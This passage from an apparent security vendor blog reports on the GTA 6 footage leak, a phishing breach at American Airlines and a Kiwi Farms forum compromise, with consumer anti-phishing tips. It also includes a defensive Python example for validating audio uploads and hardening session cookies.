  • Rogue attachments are common where fake tax refunds are concerned. If you happen to open a file from someone you weren’t expecting, don’t disable your software’s “read only” mode or its closest equivalent. Steer clear of enabling macros, too.

  • If you believe you’ve entered any data on a phishing site, there’s a small chance it may have a JavaScript keylogger running under the hood. If you know your way around code, you might be able to spot it. If not, you’re left with the hassle of trying to figure out if you need to take some action. Did the site ask for logins upfront, before anything else? Payment details? Certain forms of personal information? It’s time to do a small risk assessment checklist, and then make the appropriate decision as to whether you need to change passwords, cancel your card, or more.

Malwarebytes users are protected from the domains used in this attack. Stay safe out there!

Grand Theft Auto 6 suffers grand theft

For games publisher Take-Two Interactive, damage control is in full effect as word spreads of a Grand Theft Auto-centric network compromise. Developer Rockstar Games has suffered a major leak of upcoming game content, specifically unfinished video footage of Grand Theft Auto 6. The first anyone knew of the attack was when the person doing the compromising posted their spoils to the popular gaming site GTAForums on Sunday. A very bad weekend lay in store for the embattled game developers.

To the forums!

The post linking the content, now edited, was made to this thread on Sunday with the following message:

Here are 90 footage/clips from GTA 6. 

It’s possible I could leak more data soon, GTA 5 and 6 source code and assets, GTA 6 testing build.

Initially the “leak” was met with scepticism. There’s a long history of pranks and scams where supposedly stolen footage of upcoming Rockstar games are concerned. The stolen footage inevitably turns out to be re-edits of older game footage, or even shoddy looking content put together by the theoretical leaker in game development tools. Indeed, the reactions from multiple posters in the thread itself were dismissive of the content on display. However, they were about to change their tune.

The breach confirmed

It’s never a good sign when an organisation has to post up a tweet like the below:

The tweet confirms that Rockstar Games suffered a network intrusion, with an unauthorised third party accessing and downloading confidential information and development footage of the unreleased GTA 6. This tweet comes alongside a security filing which adds a little more detail to the current state of play:

Rockstar Games recently experienced a network intrusion in which an unauthorized third party illegally accessed and downloaded confidential information from its systems, including early development footage for the next Grand Theft Auto. Current Rockstar Games services are unaffected.

We have already taken steps to isolate and contain this incident. Work on the game will continue as planned. At this time, Rockstar Games does not anticipate any disruption to its current services nor any long-term effect on its development timelines as a result of this incident.

There isn’t a lot else to go on at time of writing, with Take-Two Interactive and Rockstar Games getting to grips with figuring out what happened, and if the attacker still has network access. There’s also the possibility of additional content leaks or some form of blackmail. Meanwhile, all we really have from the attacker is that the videos were “downloaded from Slack”. Clearly Rockstar Games will be very busy over the coming days and weeks.

Avoid the inevitable GTA6 scams

The leaked content will almost certainly keep popping up on sites such as YouTube and social media portals. What eager gamers need to watch out for is the scam aspect that will naturally attach itself, limpet style, to the footage. Based on what we’ve seen down the years in relation to gaming leaks, these are some of the things you should be very wary of:

  • Nobody is offering up a fully playable version of GTA6 on YouTube or anywhere else. Should you see such a claim, don’t take the bait and ignore/report the video as appropriate.

  • There is no leaked early-access style playable demo of the stolen content. Offers of playable GTA6 are almost certainly locked behind survey scams, and/or bundled with malware files. Ignore them.

  • On a similar note, emails from strangers claiming to offer up versions of GTA6 either as a download or as part of some sort of subscription service should be given a wide berth.

  • Depending on platform or title, you may need to log in to Rockstar Social Club to play your Rockstar games. It’s possible phishers may set up a scam which asks for logins in order to access fictitious versions of GTA6. Under no circumstances should you hand out your gaming logins to anybody.

Stay safe out there!

American Airlines suffers data breach after phishing incident

Major airline American Airlines has fallen victim to a data breach after a threat actor got access to the email accounts of several employees via a phishing attack.

According to a published notice of a security incident, the data breach was discovered in July 2022.

How it happened

American Airlines said the successful phishing attack led to the unauthorized access of a limited number of team member mailboxes. American Airlines discovered the breach on July 5, 2022 and immediately secured the impacted email accounts. It then hired a cybersecurity forensic firm to investigate the security incident. A forensic investigation can be a huge help to determine what happened and what the possible consequences of the incident are.

What the attackers had access to

In the notice, American Airlines wrote:

“The personal information involved in this incident may have included your name, date of birth, mailing address, phone number, email address, driver’s license number, passport number, and/or certain medical information you provided.”

So far, American Airlines has not disclosed the exact number of breached email accounts or how many customers were affected.

Aftermath

American Airlines says it will implement additional technical safeguards to prevent a similar incident from happening in the future.

It offers affected customers a complimentary two-year membership of Experian’s IdentityWorks℠. While we would not recommend paying for such a service, getting it for free may not be a bad deal. Identity theft monitoring services sound great at first: they’re not really expensive and seem to provide peace of mind against an avalanche of ever-more damaging breaches. But they don’t, at present, protect against the worst impact of identity theft—the theft itself.

American Airlines says it has no evidence that personal information has been abused, but recommends that you enroll in the free credit monitoring. In addition, customers should be extra vigilant, including by regularly reviewing account statements and monitoring free credit reports.

Phishing

We’d like to add that this type of incident often triggers yet another round of phishing attacks, only targeted at potentially affected customers. Typically these phishing mails will try to leverage some kind of urgency to try and trick you. For example, they might urge you to click some link to claim some sort of compensation for the incident. The sense of urgency is something almost all phishing mails have in common: They do not want you to think, just react.

Other signs that something’s phishy:

  • The email, text, or voicemail is requesting that you update/fill in personal information. This is especially dubious if it’s coming from a bank or the IRS. Treat any communication asking for your credentials with extra caution.
  • The URL shown on the email and the URL that displays when you hover over the link are different from one another.
  • The “From” address is an imitation of a legitimate address, especially from a business.
  • The formatting and design are different from what you usually receive from an organization. Maybe the logo looks pixelated or the buttons are different colors. Or possibly there are weird paragraph breaks or extra spaces between words. If the email appears sloppy, start making the squinty “this looks suspect” face.
  • The content is badly written. Sure, there are plenty of bad writers working for legitimate organizations, but this email might seem particularly amateur. Are there obvious grammar errors? Is there awkward sentence structure, like perhaps it was written by a computer program or someone whose second language is English?
  • The email contains attachments from unknown sources that you were not expecting.
  • The website you are sent to is not secure. If you do go ahead and click on the link of an email to fill out personal information, be sure you see the “https” abbreviation as well as the lock symbol at the beginning of the URL. If not, that means any data you submit is vulnerable to cybercriminals. (If the link is malicious, Malwarebytes will block the site.)

And each of the above is reason enough to question the legitimacy of the email. Phishers have evolved far past the “Nigerian prince with a treasure” level. Above all else, trust your instincts—if it looks, smells, or feels phishy then it probably is.

Stay safe, everyone!

Kiwi Farms breached, user data potentially exposed

The operators of a site known to most observers for being in a recent state of flux have announced a forum breach. Kiwi Farms, which gained a reputation for sophisticated trolling and doxxing, was recently dropped by Cloudflare after a sustained campaign to have the DDoS mitigation and cloud hosting service abandon the forum.

The site has since returned, but with a major problem: a breach which potentially reveals a large amount of user data.

The breach revealed

The site creator had the following to say in relation to the compromise:

The forum was hacked. You should assume the following.

Assume your password for the Kiwi Farms has been stolen.

Assume your email has been leaked.

Assume any IP you’ve used on your Kiwi Farms account in the last month has been leaked.

The attack made use of the interaction between the main forum site and XenForo, a commercial internet forum software package written in PHP. Attackers uploaded a webpage disguised as an audio file to XenForo, then loaded this page elsewhere in a manner which caused user authentication cookies to be sent off-site. The main admin account for the forum was apparently hijacked in this same fashion.
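Two defensive checks follow from the description above: user uploads should be verified to be what their extension claims and served so that a browser never renders them as a page, and the session cookie should carry attributes that keep it out of scripts and off cross-site requests. This is an added example written for this article, not XenForo’s or the forum’s own code; the cookie name, the header set and the sample files are constructed.

```python
"""Upload validation and cookie hardening against a 'webpage disguised as an
audio file'. Added example; not XenForo code. Samples below are constructed."""
import re

# Leading bytes we expect for each audio extension we are willing to host.
AUDIO_MAGIC = {
    ".mp3": (b"ID3", b"\xff\xfb", b"\xff\xf3", b"\xff\xf2"),
    ".ogg": (b"OggS",),
    ".wav": (b"RIFF",),
}
# Markup that should never appear in a genuine audio file.
HTML_HINT = re.compile(rb"<\s*(!doctype|html|script|body|iframe|svg)", re.IGNORECASE)


def upload_allowed(filename, data):
    """True only if the extension is an allowed audio type, the first bytes
    match that type, and the content does not contain HTML markup."""
    ext = filename[filename.rfind("."):].lower() if "." in filename else ""
    magics = AUDIO_MAGIC.get(ext)
    if not magics or not data.startswith(magics):
        return False
    return HTML_HINT.search(data[:4096]) is None


def upload_response_headers():
    """Headers for serving stored uploads: nosniff stops MIME guessing,
    attachment forces a download, and the sandbox CSP neuters any script
    if a browser still tries to render the bytes as a document."""
    return {
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": "attachment",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


def session_cookie(value, name="session"):
    """Set-Cookie value (hypothetical cookie name): HttpOnly keeps page
    scripts from reading it, SameSite=Lax keeps the browser from attaching
    it to subresource or frame requests made from another site."""
    return f"{name}={value}; Path=/; Secure; HttpOnly; SameSite=Lax"


# Constructed samples: a plausible MP3 header versus HTML renamed to .mp3,
# and HTML hidden behind a valid magic prefix.
GOOD_MP3 = b"ID3\x04\x00\x00\x00\x00\x00\x00" + b"\x00" * 32
FAKE_MP3 = b"<!DOCTYPE html><html><body>not audio</body></html>"
PADDED_FAKE = b"ID3" + b"\x00" * 8 + b"<html><script></script></html>"

if __name__ == "__main__":
    for name, blob in [("song.mp3", GOOD_MP3), ("song.mp3", FAKE_MP3), ("song.mp3", PADDED_FAKE)]:
        print(name, "accepted" if upload_allowed(name, blob) else "rejected")
```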

The fallout from a forum compromise

We often warn about using forums without implementing the proper failsafes and protection, and a breach such as this hammers home the point. A lot of users on the site may now have a lot of information exposed that they’d really rather not. Similarly, curious observers or even unwary researchers or law enforcement may have registered and not considered the possibility of a data leak.

This data could end up anywhere, and there’s no surefire way to know what’s been taken. It could end up on other forums, data dumps, or in the hands of law enforcement agencies. No matter what site you’re registered on, you should consider:

  • Use different passwords for all sites. Once those data dumps go public, cybercriminals will try logging in to other accounts using the same email and username combinations.

  • Consider using a VPN, Tor, or some other method to obscure your IP address. Some forums insist on people using their real IP address when registering and posting to a forum, and may even ban or block VPNs, proxies, and other services.

  • Be careful what you reveal to other site users via direct messages. People tend to not delete these messages, and sites don’t always auto-prune older messages. It’s also possible sites may store data sent and received, and not even tell you.

It remains to be seen what happens to Kiwi Farms, and the site owner is looking to migrate away from aspects of the site which led to this compromise. For now, it’s a timely reminder to keep on top of potential system vulnerabilities and also consider what data you may be leaving on a site for others to collect at the worst possible moment.